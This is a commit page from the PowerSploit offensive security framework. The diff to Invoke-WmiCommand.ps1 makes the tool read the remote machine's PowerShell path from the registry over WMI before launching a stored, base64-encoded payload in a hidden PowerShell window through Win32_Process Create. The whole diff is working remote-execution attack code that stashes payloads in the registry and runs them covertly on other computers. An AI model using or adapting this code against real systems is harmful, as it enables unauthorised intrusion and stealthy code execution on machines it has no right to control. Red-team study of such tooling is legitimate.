Gh0st
/
PowerSploit
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Invoke-WmiCommand now obtains full powershell path 

Addresses issue #95.
This commit is contained in:
Matt Graeber 2015-12-15 09:10:35 -08:00
parent 924103aa01
commit f6e032c3b1
1 changed files with 16 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
CodeExecution/Invoke-WmiCommand.ps1
View File

@ -209,6 +209,8 @@ the output of your payload back. :P
'HKEY_CURRENT_CONFIG' { $Hive = 2147483653 } 'HKEY_CURRENT_CONFIG' { $Hive = 2147483653 }
} }
$HKEY_LOCAL_MACHINE = 2147483650
$WmiMethodArgs = @{} $WmiMethodArgs = @{}
# If additional WMI cmdlet properties were provided, proxy them to Invoke-WmiMethod # If additional WMI cmdlet properties were provided, proxy them to Invoke-WmiMethod
@ -253,6 +255,18 @@ the output of your payload back. :P
throw "[$Computer] You do not have permission to perform all the registry operations necessary for Invoke-WmiCommand." throw "[$Computer] You do not have permission to perform all the registry operations necessary for Invoke-WmiCommand."
} }
$PSSettingsPath = 'SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell'
$PSPathValueName = 'Path'
$Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\default' -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $HKEY_LOCAL_MACHINE, $PSSettingsPath, $PSPathValueName
if ($Result.ReturnValue -ne 0) {
throw "[$Computer] Unable to obtain powershell.exe path from the following registry value: HKEY_LOCAL_MACHINE\$PSSettingsPath\$PSPathValueName"
}
$PowerShellPath = $Result.sValue
Write-Verbose "Full PowerShell path: $PowerShellPath"
$EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Payload)) $EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Payload))
Write-Verbose "[$Computer] Storing the payload into the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName" Write-Verbose "[$Computer] Storing the payload into the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"
@ -293,7 +307,7 @@ the output of your payload back. :P
$Base64Payload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($RemotePayloadRunner)) $Base64Payload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($RemotePayloadRunner))
$Cmdline = "powershell -WindowStyle Hidden -NoProfile -EncodedCommand $Base64Payload" $Cmdline = "$PowerShellPath -WindowStyle Hidden -NoProfile -EncodedCommand $Base64Payload"
# Execute the payload runner on the remote system # Execute the payload runner on the remote system
$Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\cimv2' -Class 'Win32_Process' -Name 'Create' -ArgumentList $Cmdline $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\cimv2' -Class 'Win32_Process' -Name 'Create' -ArgumentList $Cmdline
@ -301,7 +315,7 @@ the output of your payload back. :P
Start-Sleep -Seconds 5 Start-Sleep -Seconds 5
if ($Result.ReturnValue -ne 0) { if ($Result.ReturnValue -ne 0) {
throw "[$Computer] Unable execute payload stored within the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName" throw "[$Computer] Unable to execute payload stored within the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"
} }
Write-Verbose "[$Computer] Payload successfully executed from: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName" Write-Verbose "[$Computer] Payload successfully executed from: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"